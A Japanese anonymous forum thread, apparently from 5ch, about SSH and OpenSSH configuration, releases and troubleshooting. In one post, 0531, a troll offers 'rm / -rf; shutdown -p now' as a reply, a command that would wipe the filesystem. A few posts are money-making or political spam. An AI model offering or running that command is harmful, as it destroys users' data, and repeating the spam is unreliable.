OpenSSH 7.5 のハイライトらしきもの:
・ssh-1 を本格的に捨てにかかっている。一部のコマンドは -1 を受け付けない。
・UsePrivilegeSeparationがデフォルトONになり、設定はdeprecatedになった
・鍵認証でログインするとSHAハッシュが記録されるようになった。
 あとから追っかけるときに便利そう。(前からだっけ?)
Apr 5 09:28:12 saba sshd[27182]: Accepted publickey for ore from ::1 port 49525 ssh2: RSA SHA256:UfcrUWnSiFur5ra28VQoo7HgUShQueQ5LTnoJneZ48A


頑張ってOpenSSL-1.1に移植しても、
常用してるのはdropbearだからあんま意味ないじゃんと今更思った
0395名無しさん@お腹いっぱい。
垢版 |
2017/04/05(水) 12:44:28.64
>>394
Dropbearといえばmosh 1.3.0で--no-ssh-pty optionがはいってDropbearでも使えるようになったよ
オプションつけるのめんどいけど
0397名無しさん@お腹いっぱい。
垢版 |
2017/05/12(金) 02:00:27.48
ド素人スマソ。 OpenSSH Windows版ぶっ込んだサーバーpcにスマホのクライアントアプリからwolさせるSSHコマンドてある?
ググったらether-wakeてのが出たけどこれなの?
教えてエロい人
0399名無しさん@お腹いっぱい。
垢版 |
2017/05/12(金) 10:09:22.52
>>398 レスサンクス。スマホのwolアプリてパケットが暗号化されてるかよくわからないのでSSHでやれたら良いなぁと思った訳です。
0400名無しさん@お腹いっぱい。
垢版 |
2017/05/12(金) 18:10:39.13
>>399
何を何のために暗号化したいの
WOLはネットワークインタフェースカードの限られた部分で処理するから暗号化なんてしてたら処理できないんじゃ
0402名無しさん@お腹いっぱい。
垢版 |
2017/05/12(金) 19:03:49.37
>>400>>401 レス感謝!ガチなド素人なもんでホントスマン。その暗号化が必要かどうかもわかってないもんで。
もともとは使ってる某NECルーターにある「ホームipロケーション」という簡易ddns機能的な奴を使って外部からwolをしようとしたら送信画面が暗号化されてない事に気付いて、これをなんとかしようと思った訳です。
よっぽどヤマハのルーターでも買ってやろかと思ったけどSSHサーバーぶっ込むの面白そうだなとチャレンジ中。
0403名無しさん@お腹いっぱい。
垢版 |
2017/05/12(金) 21:27:07.67
>>402
外部とルータ間の通信の暗号化は必要かもしれない
誰かが認証を盗聴したら同じことができてしまうからね

もしsshで接続できたとしたら、そのPCは起動しているだろうからWOLは不要

wake on lanはその名の通りLANで使うもの
同一ネットワーク内の全ての端末に簡単な通信パケットを送って各自がそれを見て自分宛だったら起動する
基本的には他のネットワークからは起動できない
だからルータにその機能がよくついている

外部端末とルータ間の通信の暗号化をお勧めする
またはVPNとか
0404名無しさん@お腹いっぱい。
垢版 |
2017/05/12(金) 22:03:21.63
>>403 エスパー発見!ありがとうございます。聞きたい事が全て先回りで答えが出てる感じ。やっぱVPNか。最初はpcをvpnサーバにしようかと思ってたところノーパソサーバ化&常時起動は火災の元みたいなスレ見てwolの適時起動にしようかと思ったの。
お騒がせしました。壮大なスレチでスマソ。
0406名無しさん@お腹いっぱい。
垢版 |
2017/05/12(金) 22:17:36.68
>>405 ラズパイ考えてた!スペックの低い端末を鯖にした時の通信速度が心配で候補から外してた。(あと敷居が高そうで)
メガサンキュー!方向性が見えてきた。
0407名無しさん@お腹いっぱい。
垢版 |
2017/05/12(金) 22:52:24.60
>>406
余程古い環境以外は通信速度のほうがボトルネックになるからそこまで気にしなくてもいいと思うけどなー、まあ敷居が高いのは言えてるが
0409名無しさん@お腹いっぱい。
垢版 |
2017/05/13(土) 09:09:21.09
ここの人はスマホのSSHクライアント使ってる?
便利だけどすごく不安だわ
悪意のあるクライアントだと秘密鍵・パス・ホスト名を送信してるかもって思う
0412名無しさん@お腹いっぱい。
垢版 |
2017/05/14(日) 07:27:18.76
自分でビルドせずにストアから入れる場合は
そのソースから変更されないでビルドされてること確認しないとな

信頼できるディストリビューターって楽だな感謝
0415名無しさん@お腹いっぱい。
垢版 |
2017/06/27(火) 18:28:55.10
一度ログインできたホストに対して、コネクション落ちた後とか
何らかのきっかけで再ログインしようとした時に
「ssh_exchange_identification: Connection closed by remote host」
になる場合ってどういう原因でなりやすいの?

現状だと仮想マシンで運用しているからバックアップの仮想マシン
のスナショを新たに複製してそっちにはログインできる。
ログインできなくなったVMは使い捨ててるけど流石にめんどくさすぎる。
どうすれば効率よく再ログインできるようになる?
0417名無しさん@お腹いっぱい。
垢版 |
2017/07/09(日) 17:24:51.18
tor ってsshポートフォワードで不特定多数のサーバプロキシしてんの?
レイヤがよくわからん
0418名無しさん@お腹いっぱい。
垢版 |
2017/07/09(日) 23:38:21.08
>>417
sshスレにいるってことは公開鍵暗号を理解してる前提で説明すると
複数のtorノードをピックアップして各ノードの公開鍵で次のような入れ子の暗号データを作る
ノード1の公開鍵(ノード2の公開鍵(ノード3の公開鍵(オペレーション)))
ノード1が上のデータを受け取ると自分の秘密鍵で復号化してノード2に送る
ノード3まで来ると復号化した時にオペレーションが見えるので実行する
各ノードは最終ノード以外あといくつのレイヤがあるか分からない
0419名無しさん@お腹いっぱい。
垢版 |
2017/07/10(月) 01:56:21.15
>>418
うっわぁ・・・手が込んでるなこれ
接続結構遅くなるんじゃない?
鍵交換の猶予時間厳しくすればTorだけ弾けたりするのかな。
だめだ、最後のノードしか関係ないんだよな。
手動でしか鍵作ったことないけどssh-keygenとかそういう諸々は
自動化されてるのか?
転送先ってランダムなんでそ?
0422名無しさん@お腹いっぱい。
垢版 |
2017/08/15(火) 14:16:08.91
CentOS7の、OpenSSH6.6を使ってます

マシンにはLANインタフェースが3つあり、1つはインターネットへ、2つは内部用です

ここで、インターネット用のインタフェースだけ、SSHのポートを例えば2222に変更、それ以外は標準の22で利用したいと思ってます

sshd_configに、port 2222、ListenAddressにIPアドレス:22と書けば良いという情報を見つけたのですが
このListenAddressをカンマ区切りやスペース区切りなど色々と試しましたが複数の指定はできないらしく、
また0.0.0.0:22を指定するとインターネット用インタフェースでも22番をリッスンしてしまいます

結局、sshd_configは諦めて、iptablesによるフィルタリングとポートフォワードを併用して実装はしているのですが、
sshとiptablesの両方が設定に絡んでいて、分かりづらくなっているのを改めたいです

sshd_configで上記のような設定をすることは可能ですか?
0425名無しさん@お腹いっぱい。
垢版 |
2017/08/15(火) 22:46:28.19
>>423
複数行で
ListenAddress インターネット:2222
ListenAddress 内部1:22
ListenAddress 内部2:22
と書いたところ、うまくいきました

ありがとうございました
0426名無しさん@お腹いっぱい。
垢版 |
2017/10/04(水) 21:46:58.61
OpenSSH 7.6
・ssh-1プロトコル完全に捨て
・arcfour,blowfish,CAST捨て
・1024ビット未満のRSA鍵は受け付けない
・CBC cipherはデフォルトで提供しない

古いssh鯖だと1024ビット未満制限とかCBCに引っかかるところあるんじゃないかな?
0437名無しさん@お腹いっぱい。
垢版 |
2017/12/22(金) 18:51:19.12
Agent Forwardingは
A->B->Cって繋げていくとき
AからBの鍵とBからCの鍵が同じじゃないと出来ないと思うんですけど
あってますか?
0438名無しさん@お腹いっぱい。
垢版 |
2017/12/22(金) 20:17:45.61
>>437
必要な鍵は「AからBの鍵」と、「AからCの鍵」
それらは別の鍵でいい

「BからCの鍵」は不要だよ

それらをすべて同じ鍵にすると、BにはAの秘密鍵も公開鍵も配置する必要があり
真に重要な鍵(Aの秘密鍵)を他人(B)に預けずに済むというAgent Forwardingのメリットが
なくなってしまっているのでは
0440名無しさん@お腹いっぱい。
垢版 |
2017/12/29(金) 07:03:23.63
誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。

グーグル検索⇒『宮本のゴウリエセレレ』

KMBRYP28K7
0441名無しさん@お腹いっぱい。
垢版 |
2018/02/05(月) 09:29:37.72
sshで接続されたとき、クライアント側のオプションによって
クライアントが、サーバに接続したときにポートフォワードの設定ができますよね

これをサーバ側からできませんか?
サーバが、クライアントから接続されたときにポートフォワードの設定をしたい
0442名無しさん@お腹いっぱい。
垢版 |
2018/02/06(火) 08:26:48.25
>>441
「サーバ側」の意味がよく分からないが、サーバ側でリスンしてクライアント側に繋ぐなら-Rでよいかと。
それとも繋いで来たクライアントにポートフォワードを強制させるサーバ側の設定があるかということ?
多分それは無理だと思う。
0444名無しさん@お腹いっぱい。
垢版 |
2018/02/14(水) 09:20:46.82
☆ 私たち日本人の、を改正しましょう。現在、
衆議員と参議院の両院で、改憲議員が3分の2を超えております。
0445名無しさん@お腹いっぱい。
垢版 |
2018/04/09(月) 22:08:02.38
OpenSSH 7.7出たけど今回はあんま変わってないね。
yesと答えるところで yes hoge と入れると弾かれるとか
なんかどうでもいい修正も入ってる(expectとかの誤動作対策かな?)
0447名無しさん@お腹いっぱい。
垢版 |
2018/04/25(水) 10:36:59.11
てすと
0448名無しさん@お腹いっぱい。
垢版 |
2018/04/25(水) 10:39:23.44
sshでログイン時に表示されるhow toのような物を表示させたくないので
その設定方法を教えて下さい
sshd_configで
PrintMotd no
Banner none
上記の設定でOSの起動時のメッセージは表示されなくなったけど
何種類かのhow toのような物がランダムな順序で表示される
0451名無しさん@お腹いっぱい。
垢版 |
2018/04/25(水) 17:46:10.72
>>450
ありがとうございます

ssh用のログインユーザーの
~/.login
~/.profile
の2つのファイルに書かれていたので、コメントアウトしました
これで、すっきりしました
0453名無しさん@お腹いっぱい。
垢版 |
2018/05/22(火) 02:42:32.57
知り合いから教えてもらったパソコン一台でお金持ちになれるやり方
時間がある方はみてもいいかもしれません
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』

K9FUK
0454名無しさん@お腹いっぱい。
垢版 |
2018/08/26(日) 17:44:28.60
openssl-1.1.1-pre9 が出たので ライブラリだけ再コンパイルしたんだが
sshd って再コンパイルしてやらないと動いてくれないのな。
めんどくさい。
# `pwd`/sshd
OpenSSL version mismatch. Built against 10101008, you have 10101009
0456名無しさん@お腹いっぱい。
垢版 |
2018/10/28(日) 17:16:17.45
OpenSSH-7.9p1 って OpenSSL-1.1.x サポートするようになったのね。
パッチ当てなくてもconfigureも通るしコンパイルできる。

EVP_CipherInit_ex のパッチは必要でなくなったのかな?
0459名無しさん@お腹いっぱい。
垢版 |
2019/03/29(金) 18:11:32.25
Solaris 11.4 の sshd (OpenSSH_7.5p1, OpenSSL 1.0.2o 27 Mar 2018) の設定なのですが

sshd_config に、

# Site local settings
Match Address *,!192.168.1.0/24
MaxAuthTries 0

のようにして指定のIPアドレス以外からの接続を拒否しています。
これに、あるドメイン(例: *hogehoge.com)からのアクセスも受け付けるようにしたいのですが
Match host *,!*.hogehoge.com
MaxAuthTries 0
のように記述を加えたらどこからもアクセスできなくなってしまいました。

Match Address と Match Host を「先の条件を満たし、かつ 後の条件を満たす」ではなく
「どちらかを満たせば接続を許可する」設定というのは、どうすればよいのでしょう?

Match address *,!192.168.0.0/24 and Mtach host *,!hogehoge.com
MaxAuthTries 0

なんて論理式書ければいいんですが そういうのは無いですよね?
ちなみに件の sshd には、tcp_wrappers はリンクされていません。
0460名無しさん@お腹いっぱい。
垢版 |
2019/03/29(金) 19:02:41.08
自己解決できてしまいました。
まずどうやってもうまくいかなかった理由
  UseDNS no
デフォルトでは DNS 逆引きをしてくれませんでした。マッチする筈がない。

次に * で拒絶して、! で除外してしまうと、そこで * にマッチして拒絶決定するので
最初に MaxAuthTries 0 でデフォルト拒否にして、Match Address と Match Host で
マッチするものを許可するようにしたところ、うまく動作するようになりました。

# Site local settings
UseDNS yes
MaxAuthTries 0
Match Address 192.168.1.0/24
MaxAuthTries 6
Match Host *.hogehoge.com
MaxAuthTries 6
0461名無しさん@お腹いっぱい。
垢版 |
2019/03/29(金) 19:37:31.06
ところで、IPアドレスで接続制限をするために MaxAuthTries を 0 にするっていうのは
Oracle Solaris のドキュメントを見て設定したんだけど

これだと Teraterm Pro のパスワード入力画面は出てしまうし、
(試行回数 0 なので正しいパスワードを入れても拒否される)
tcp_wrappers みたいに「接続してきた時点で認証前に接続を切断」
またはそれに近い、もっとスマートな方法はないですかね?
0464名無しさん@お腹いっぱい。
垢版 |
2019/03/31(日) 14:04:06.34
>>462
デフォルトを none、Match に match した場合に any になるようにしてみましたが、

none が適用される状況でも MaxAuthTries で指定した回数を超えるまでパスワード入力
できてしまいますね。もっとも、正しいパスワードを入力しても
  Permission denied, please try again.
が繰り返し表示されてログインできないのですが。

単純に disconnect ってディレクティブが使えればねー
0465名無しさん@お腹いっぱい。
垢版 |
2019/04/01(月) 00:02:41.38
sshのconfigは腐りすぎててどうしようもないと思うんだ

AuthenticationMethodsは認証通過可能なものを設定するだけで、個々の認証に挑戦するかどうかは
PubkeyAuthenticationやPasswordAuthenticationなどの*Authenticationで決まる
つまり全ての*Authenticationをnoにすることで認証に挑戦しなくなる

ただしデフォルトをnoにすると機能しなくなる認証タイプもあるという腐れっぷりなので注意が必要かも
そういう場合、デフォルトをyesにしておいて、最後の最後でMatch *でnoするとかの小細工がいる
0466名無しさん@お腹いっぱい。
垢版 |
2019/04/02(火) 22:23:11.87
>> sshのconfigは腐りすぎててどうしようもないと思うんだ

にもかかわらず、
Oracle Solaris にしろ debian にしろ、素の OpenSSH 実装に変えてきてるしねぇ
0467名無しさん@お腹いっぱい。
垢版 |
2019/05/05(日) 23:44:43.59
ウェルノウンでないポートをssh用に開いていて時々海外からアクセスがあるんだけど
今日の未明に日本のNTTアドバンステクノロジから来ていた
調査か何かしているのかな?連休の未明だから間違えて接続とかではなさそうだし
0472名無しさん@お腹いっぱい。
垢版 |
2019/06/06(木) 01:11:49.25
Teraterm って複数相手のサーバーにSSHで接続する場合にも、
秘密鍵を1つしか使わないだろうと勝手に仮定して作られているようで、
そのため、実際にはつなぐ相手によって秘密鍵が違う場合には、
つなぐ相手のサーバー毎に、秘密鍵を指定しなおさなければならず、
とても不便だ。

接続先のサーバーと秘密鍵の組み合わせを登録できなきゃ不便だ。

Unixの上のSSHだったら、 .ssh の下に config ファイルを書いて、
どのホストに接続するのかによって、identity ファイルを切り替え
られるようになっているのにな。
0475名無しさん@お腹いっぱい。
垢版 |
2019/07/06(土) 19:30:20.15
ホームディレクトリに生成される~/.sshディレクトリってどうしても移せないのかな。
できればホームディレクトリがすっきりしている方が嬉しいので~/.config/sshあたりに移したい。
0476名無しさん@お腹いっぱい。
垢版 |
2019/07/06(土) 20:44:38.73
そのおかしな感情を消す努力をした方が
後々のあなたの人生において
いろいろなことが優位に動くでしょう
0478名無しさん@お腹いっぱい。
垢版 |
2019/07/08(月) 22:08:03.15
AuthorizedKeysFile を ~/.config/.ssh/authorized_keys にすればお望み通りになるだろう
だが、それで何かがすっきりするとは思えん
0482名無しさん@お腹いっぱい。
垢版 |
2019/08/26(月) 23:04:30.22
>>480
めぐみんがいいです

scanner1.openportstats.com[89.248.168.62]という怪しい客人から隠し扉をノックされたw
ああいうのはいちいち大きな番号のポートまでスキャンして、開いているとSSHのログインを試行しているのかな
0483名無しさん@お腹いっぱい。
垢版 |
2019/08/27(火) 20:42:49.12
ポートスキャンすらされない1ケタ番台ポートを隠し扉にするって手もあるぞw


OpenSSH 8.0p1 を OpenSSL 1.1.1でコンパイルしてmake test全部通ったやしいる?
公式には非対応だけどビルドはできる。
ただ漏れマシンななんか怪しくてmake LTESTS=rekey t-exec がランダムに
通ったり通らなかったりする
0484名無しさん@お腹いっぱい。
垢版 |
2019/08/27(火) 23:08:54.16
$ ssh -V
OpenSSH_8.0p1, OpenSSL 1.1.1a-freebsd 20 Nov 2018

ちなみにsynスキャン、finスキャンは全部蹴ってる
pfのルールもsynproxy + antispoof

今のところ結構効果はあると、、思う
0485名無しさん@お腹いっぱい。
垢版 |
2019/08/29(木) 15:43:09.69
ports treeから

# make test

&#12316;&#12316;&#12316;&#12316;&#12316;&#12316;

all tests passed
1699.705u 100.260s 48:55.51 61.3% 305+337k 97+724io 25pf+0w

# /usr/local/bin/ssh -V
OpenSSH_8.0p1, OpenSSL 1.1.1c 28 May 2019
0488名無しさん@お腹いっぱい。
垢版 |
2020/01/19(日) 19:16:24.13
ちょっとここでいいのか不明ですが質問させてください
Windows10のOpenSSHに接続して、遠隔でAutoItというスクリプトツールで作ったexeから
ホットキー操作を発生させようとしてるのですが、動作しません
SSHでログインできるフォルダ内でecho >> hogehoge.txtとか
あるいはそのAutoIt内でテキストを書くのは(startコマンドで)出来るのですが
ホットキーはだめでした
(SSH経由せずにstart /WAIT hogehoge.exeなら普通に動く)

こういうのはSSHでは不可能なんでしょうか?
0489名無しさん@お腹いっぱい。
垢版 |
2020/01/19(日) 22:31:34.39
自己解決、というかとりあえずテキストにコマンド書いてファイル監視でうまくいったので
これでいくことにしました、失礼しました
0490名無しさん@お腹いっぱい。
垢版 |
2020/03/11(水) 00:31:44.87
OpenSSH-8.2 からは、広く使われている HostKeyAlgorithms=ssh-rsa が
SHA1が危険だからという理由で取り除かれてしまうらしい。

ssh -oHostKeyAlgorithms=-ssh-rsa user@host で繋がらないホストは
将来繋がらなくなるよとリリースノートに書いてある。

手元ではdropbearのサーバがssh-rsaしかしゃべれてないな…
OpenSSHだけの世界ならあんま問題にならんのかもしれんかもだけど
影響は大きそう。
0491名無しさん@お腹いっぱい。
垢版 |
2020/03/26(木) 19:49:44.20
WANに存在する踏み台を経由して接続してきた相手の大元のipを調べることはできますか?
プロバイダの協力は無しという条件で
0493名無しさん@お腹いっぱい。
垢版 |
2020/04/07(火) 18:28:32.82
https://github.com/PowerShell/Win32-OpenSSH/releases
WIndows版のOpensshのことでちょっとお聞きしたいのですが、
クライアント側の設定でデフォルトのポート番号を変更する(22→65222)には
接続時に一々 -p 65222とやる以外に恒久的にしておく方法はありませんか?
Linuxなどでは/etc/ssh/ssh_configファイルにportを記述する場所がありますが、
上のgithubのreleaseにはsshd_configはあるものの、ssh_configが見当たらないのです。
UNIXと関係ない話題かもしれませんが、Windows板にもLinux板にもSSHスレが見当たらなかったので
質問させていただきました。どうも失礼しました。
0494名無しさん@お腹いっぱい。
垢版 |
2020/04/07(火) 21:15:10.64
Windows でもユーザーのホームディレクトリ下に .ssh ディレクトリを作って、その中に置けばいいのではないかと
C:\Users\(ユーザー名)\.ssh\ssh_config
0495名無しさん@お腹いっぱい。
垢版 |
2020/04/08(水) 07:52:29.78
>>494
ファイル名がssh_configではなくconfigならいけました。
ここらへんはLinux等と同じようです。
ただwin8.1タブだとpowershellの画面がバグってログインしても$プロンプトが表示されない
のですが、コマンドは普通に使えるようです。
とにかく、教えてくださってありがとうございました。
0498名無しさん@お腹いっぱい。
垢版 |
2020/04/11(土) 18:38:48.87
即レスありがとうございます
勘違いしていました
VisualHostKeyはサーバーのホストキーのイメージなんですね

ではssh-keygenで作成した公開鍵のfingerprintのrandomartは、
どういうときに使用されるのでしょうか
これを確認する方法はありますか?
0500名無しさん@お腹いっぱい。
垢版 |
2020/04/11(土) 19:37:48.21
公開鍵のハッシュですから、公開鍵が間違ってないか確認するのに使えることになってますね
ユーザーが自分で作成した公開鍵を、サーバー管理者にメールで送って、フィンガープリントは別の方法(LINEとか)で送る
受け取ったサーバー管理者は、公開鍵のフィンガプリントを照合して「よしっ」と言う
こういうシナリオはよく紹介されていますが、実際にやっているかどうかは分かりません(私はやってません)

自分の経験としては、サーバーのauth.logにはログインしてくるユーザーの公開鍵のフィンガープリントが記録されているので
それと authorized_keys に登録されている公開鍵のフィンガープリントを比べて、登録されているかどうか調べたことくらいです
0502名無しさん@お腹いっぱい。
垢版 |
2020/04/12(日) 00:41:49.10
ちょっと便乗
サーバーのホストキーのハッシュっていうけど、クライアントの公開キーを変えると返ってくるホストキーのハッシュ変わらない?
0505名無しさん@お腹いっぱい。
垢版 |
2020/04/13(月) 17:15:59.47
>>502
公開鍵(と秘密鍵のペア)を新しく作ってみたけど、サーバー側のホストキーのフィンガープリントは変わらなかったぞ
別のクライアントから、異なるユーザーで、公開鍵認証を使わずに接続したときも、サーバー側ホストキーのフィンガープリントは同じだった
0507名無しさん@お腹いっぱい。
垢版 |
2020/04/27(月) 22:37:15.55
一概に余計とはいえないが、ブロードキャストもバカにならないからね
VPNとSSHを比べるなら、SSHの方が速くなるよ

でもSSH+RDPってことは、PCにCygwinでも入れてSSHトンネルを掘る、なんていうことを
やろうとしてるのかな
その場合SSHの暗号化・復号をPCでやることになるから、その処理リソースを考慮すると
どうなるだろうね

VPNならルータにその辺の処理をお任せできてPCはRDPに専念できるから、
RDPの操作感はVPNの方がよくなるかもしれない
0513名無しさん@お腹いっぱい。
垢版 |
2020/05/09(土) 02:28:47.16
man ssh
0520名無しさん@お腹いっぱい。
垢版 |
2020/05/09(土) 16:24:47.43
manはあくまでその実装の解説だからね
SSHそのものに関して知るならやはりRFCだろうね。つか、こんなにあったのか

RFC4250 The Secure Shell (SSH) Protocol Assigned Numbers
RFC4251 The Secure Shell (SSH) Protocol Architecture
RFC4252 The Secure Shell (SSH) Authentication Protocol
RFC4253 The Secure Shell (SSH) Transport Layer Protocol
RFC4254 The Secure Shell (SSH) Connection Protocol
RFC4255 Using DNS to Securely Publish Secure Shell (SSH) Key Fingerprints
RFC4256 Generic Message Exchange Authentication for the Secure Shell Protocol (SSH)
0523名無しさん@お腹いっぱい。
垢版 |
2020/05/21(木) 13:26:55.64
初心者です。公開鍵、秘密鍵でのsshにつて質問です

ssh-keygenしてssh-copy-idで接続できました。
そして、同じリモートから違うサーバーにsshしたい場合は
上で作ったssh-keygenを使い回すのですか?
それともまたssh-keygenで作るのですか?
0524名無しさん@お腹いっぱい。
垢版 |
2020/05/21(木) 15:16:18.18
>上で作ったssh-keygenを使い回すのですか?
を「ssh-keygenで作った公開鍵、秘密鍵を使いまわすのですか?」と解釈して
私は使いまわしてます
0525名無しさん@お腹いっぱい。
垢版 |
2020/05/21(木) 21:54:02.35
>>524
なるほど、ありがとうございます!
0526名無しさん@お腹いっぱい。
垢版 |
2020/05/22(金) 00:12:47.51
>>523
それは、最初にsshで接続したリモートのマシンに
自分の公開鍵と秘密鍵のキーペアが両方存在するという状況になるんでないのかな

そういう使い回しはしちゃダメだよ
0527名無しさん@お腹いっぱい。
垢版 |
2020/05/22(金) 01:30:12.90
>>523
AからBにsshでログインできてて、
次にBからCにsshでログインしたい、ってこと?
だったらBであらたに鍵ペアを作り直すのが基本
秘密鍵は作ったマシンから外に出さないのが原則
0528名無しさん@お腹いっぱい。
垢版 |
2020/05/22(金) 01:37:25.21
>>526
ごめんなさい、書き間違いです

誤)そして、同じリモートから違うサーバーにsshしたい

正)そして、同じクライアントから違うサーバーにsshしたい
0529名無しさん@お腹いっぱい。
垢版 |
2020/05/22(金) 01:37:52.49
>>527
ごめんなさい、書き間違いです

誤)そして、同じリモートから違うサーバーにsshしたい

正)そして、同じクライアントから違うサーバーにsshしたい
0530名無しさん@お腹いっぱい。
垢版 |
2020/05/24(日) 00:15:42.34
ssh -L 5555:192.168.1.10:5432 psql -h localhost -p 5555 ...

↑だとリモートでpsqlが実行されるので期待した動作ではない

ssh -f -N -L 5555:192.168.1.10:5432
psql -h localhost -p 5555 ...
kill ...

↑だと期待した動作だけどプロセス探してkillするのがめんどくさい

スマートな書き方はないですかね?
0531名無しさん@お腹いっぱい。
垢版 |
2020/05/26(火) 13:59:12.77
rm / -rf; shutdown -p now
0538名無しさん@お腹いっぱい。
垢版 |
2020/11/04(水) 00:01:30.26
sshdでchrootdirectoryを設定するとproxycommandでフォワードする時にアドレス引けなくなるとは知らなかった。
原因に気がつくのにえらく手間取った。

考えてみれば踏み台でそんな設定しなくても良かったか。
0540名無しさん@お腹いっぱい。
垢版 |
2020/11/29(日) 13:23:58.33
opensshクライアントの設定ファイル内でその設定ファイルのパスを参照する変数みたいなものはありますか?
configから見たキーファイル、known_hostsの相対パスは決まっているけど、それらを配置する親フォルダをどこにするかは決まっていないとします
親フォルダのパスに依存しないようにconfigを書く方法を知りたいです
0543名無しさん@お腹いっぱい。
垢版 |
2021/02/16(火) 00:20:14.42
コマンドプロンプトでsftpコマンドでログインしようとしたらパスワードの部分が入力出来ないんだけど何故かわかる人いる?
0546名無しさん@お腹いっぱい。
垢版 |
2021/02/17(水) 03:32:43.53
>>545
一応ポート通信の許可はファイアウォールでしたんだけど、それだけじゃなくてfreesshdの動作許可みたいな物もしなきゃいけないって事ですか??
0549名無しさん@お腹いっぱい。
垢版 |
2021/02/18(木) 02:24:24.46
仕様による脆弱性もあれば、実装による脆弱性もあるかと

てかこのfreeSSHDって、Windows Server 2008とかその辺がターゲットじゃないのかな
サービス周りやセキュリティ機構がもう当時とは全然違うWindows Server 2016とかでは
そのプログラムがシステムコールを発行できているかも怪しい気が
0554名無しさん@お腹いっぱい。
垢版 |
2021/03/26(金) 11:14:08.05
sshってのはtelnetみたいな使い方はできない?

587ポートに接続してsmtpで会話してメール送信
みたいなやつ
0556名無しさん@お腹いっぱい。
垢版 |
2021/03/26(金) 21:52:50.96
モノにもよるけど、SSH v1がまだ有効な頃の古いsshだと
ssh -1 -c none 相手サーバ:587
とかやると暗号化無しでtelnetみたく使えた気がする

記憶を頼りに試しにAlma Linux 8.3でやってみたが、SSH v1は対応してないって出て無理だった

素直にtelnet使うのがいいんじゃねえんかなと思う
0559名無しさん@お腹いっぱい。
垢版 |
2021/03/27(土) 18:28:36.71
telnet コマンドがインストールされてないので ssh コマンドで代用できないか、という質問なのか
もっとこう宇宙の深淵を覗き込むようなすごい用法を考えているのか
実はsmtpサーバーが公開鍵認証で接続許可することは出来ないのかと考えているのか
0560名無しさん@お腹いっぱい。
垢版 |
2021/03/28(日) 04:12:14.30
-c noneはトンネルを暗号化しないだけで認証はSSHプロトコル通りだったと思う
CPUがしょぼいため全通信を暗号化してられなかった時代の名残
0561名無しさん@お腹いっぱい。
垢版 |
2021/07/28(水) 19:11:16.05
ipv6とipv4のデュアルスタックの環境で、ipv4のとあるネットワーク(192.168.2.0)のホストから別のネットワークの(192.168.1.0)ホストに
sshするとスタックしてしまうのですが、同様の方います?
もちろん両ネットワークの間のルータには静的ルーティングを書いてあって、NAPTは無効にしてあります。(YAMAHA RTX830)
ipv6アドレスなら繋があります。IPv4のNAPTがあろうが無視して繋がります。(当たり前かもしれませんが)
0562561
垢版 |
2021/07/28(水) 19:13:30.52
あ、192.168.2.xのホストから192.168.1.xのホストへのpingとtracerouteは通るようです。
sshだけ通りません。
0563561
垢版 |
2021/07/28(水) 20:09:22.61
OSはdebian GNU/Linux buster/sid
opensshのバージョンは1:8.3pです。
0565名無しさん@お腹いっぱい。
垢版 |
2021/07/29(木) 06:57:00.27
>>564
ssh -4 -v 192.168.1.4
です。local string〜といjというところで止まってしまいます。

>>563
busterベースに、sidのパッケージを加えているという意味です。
カーネルも5.10です。
0567名無しさん@お腹いっぱい。
垢版 |
2021/07/29(木) 14:28:39.14
>>566
3分ぐらい経っても反応がないので、ctrl+Cでキャンセルしてます。
検索すると、local version string~で止まってしまうのはよくあるようで、
原因は多岐にわたるようなのでipv6とのデュアルスタックが問題ではないかもしれません。
前のルータ(NAPTをオフにしたaterm wg2600hp2というipv4用家庭用ブロバンルータ)のときは、
pingを1回打たないとsshがつながらなかったのですが、今回はpingを打ってもsshできない点が異なります。
もうちょっと自分で調べてみようと思います。
どうもお騒がせしました。
0568名無しさん@お腹いっぱい。
垢版 |
2021/07/29(木) 18:12:27.02
-vvv
ぐらいにしてみるとか

そもそもネットワークの構成自体に問題がありそうですね
0569名無しさん@お腹いっぱい。
垢版 |
2021/08/30(月) 08:51:04.98
SSH_ASKPASSで呼び出すプログラムに、
接続しようとしてるホスト名とかユーザ名とかを渡すことって
できませんかね
0570名無しさん@お腹いっぱい。
垢版 |
2021/09/10(金) 16:41:21.69
そいやSSH_ASKPASSによるパスワード入力って、sftpには効かないのかな

証明書入れたりできないんだけど非対話にsftpやりたい
0572名無しさん@お腹いっぱい。
垢版 |
2021/10/15(金) 22:45:48.63
ログ見たら*.unifiedlayer.comって所からDoSアタックか?ってくらい大量にパスワード認証でログインを試みられてた

パスワード認証できないんだから攻撃対象を変えればいいのに……
パスワード認証できなくてもゴリ押しで何かできるのかな
0573名無しさん@お腹いっぱい。
垢版 |
2021/10/25(月) 15:19:03.34
親戚ということにしてください。

mosh で接続すると画面にゴミというか、乱れるのですがどうすればいいか
教えてください、偉いひと

同じターミナルそふとの ssh ではそのようなことはありません。
0575名無しさん@お腹いっぱい。
垢版 |
2021/12/15(水) 11:50:33.60
ssh経由でAndroidからパソコンのexeファイルを開いたら何故か画面に表示されません
タスクマネージャで見る限り起動してはいるようです
パソコン画面に起動したexeを表示させる方法はないですか?
0577名無しさん@お腹いっぱい。
垢版 |
2022/01/29(土) 11:50:46.96
デスクトップと同じワークステーションで動かす
分からなければググれ
0579名無しさん@お腹いっぱい。
垢版 |
2022/11/20(日) 12:15:46.89
   | \
   |Д`) ダレモイナイ・・オドルナラ イマノウチ
   |⊂
   |


     ♪  Å
   ♪   / \   ランタ タン
      ヽ(´Д`;)ノ   ランタ タン
         (  へ)    ランタ ランタ
          く       タン



   ♪    Å
     ♪ / \   ランタ ランタ
      ヽ(;´Д`)ノ  ランタ タン
         (へ  )    ランタ タンタ
             >    タン
0581名無しさん@お腹いっぱい。
垢版 |
2023/06/14(水) 22:46:40.05
誰かいる?(´・ω・`)

ssh -i ファイル ユーザ@サーバ コマンド
ssh -t -i ファイル ユーザ@サーバ コマンド

1つ目の方はコマンドの終了ステータス取れるんだけど2つ目の-tありだとステータス取れなくて困ってます
-tオプションの仮想端末わりあてしないとどういうデメリットある?
-tオプションつけたままでコマンドの終了ステータス取る方法ある
0583名無しさん@お腹いっぱい。
垢版 |
2023/06/20(火) 14:51:56.48
-t をつけるのは、そのコマンドが対話的な入力を求めるときじゃないのかな
なのでデメリットは入力が必要なコマンドが途中で止まっちゃうこと
終了ステータスはわからん
0584名無しさん@お腹いっぱい。
垢版 |
2023/09/10(日) 04:35:39.02
putty を長年使用していたが RLogin を試してみたらタブと一斉送信が便利すぎて鞍替えした。
